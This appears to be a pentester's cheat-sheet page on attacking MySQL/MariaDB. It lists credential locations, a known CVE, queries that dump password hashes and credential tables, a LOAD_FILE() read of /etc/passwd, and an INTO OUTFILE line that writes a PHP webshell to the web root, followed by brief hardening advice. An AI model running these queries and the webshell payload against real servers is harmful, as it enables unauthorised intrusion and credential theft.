MySQL / MariaDB | KagisoSec

Ports

Port	Proto	Notes
`3306`	tcp	MySQL / MariaDB

Fingerprint

Banner reveals version (e.g. 5.7.x, 10.x MariaDB)
nmap mysql-info script

Key files

Path	Holds	Sensitive
`/etc/mysql/my.cnf`	server config, sometimes inline creds	sensitive
`~/.my.cnf`	cached client credentials	sensitive
`/var/lib/mysql/`	data directory (raw tables)
`app configs (wp-config.php, freepbx.conf, config.php)`	DB user/password reused elsewhere	sensitive

Default / weak creds

root / (blank on old installs)
app DB users found in web config files

Service users

mysql

Known CVEs

CVE	Impact
CVE-2012-2122	Authentication bypass via repeated login (memcmp timing)

Exploitation primitives

FILE privilege: LOAD_FILE() reads files, SELECT ... INTO OUTFILE/DUMPFILE writes a webshell to the web root
UDF code execution when FILE plus a writable plugin directory exist
Crack mysql_native_password hashes, or reuse the DB password for SSH / su

Overview

MySQL/MariaDB on 3306 is both a data target and a file primitive. The FILE privilege is the big one: it converts a SQL injection or a valid login into arbitrary read/write on disk.

Enumeration

Connect:

mysql -h <TARGET> -u root -p

Check your grants (look for FILE):

SELECT user(); SHOW GRANTS;

Where is OUTFILE allowed:

SELECT @@secure_file_priv;

Dump MySQL’s own account hashes (crack offline):

SELECT user,authentication_string FROM mysql.user;

Find application credential tables (names vary per app):

SELECT table_schema,table_name FROM information_schema.columns WHERE column_name LIKE '%pass%';

Then dump whichever users/credentials table you found:

SELECT * FROM <db>.<table>;

File primitive

SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_GET["c"]);?>' INTO OUTFILE '/var/www/html/s.php';

Hardening

Drop FILE from app accounts, set secure_file_priv, and never reuse DB passwords for OS accounts.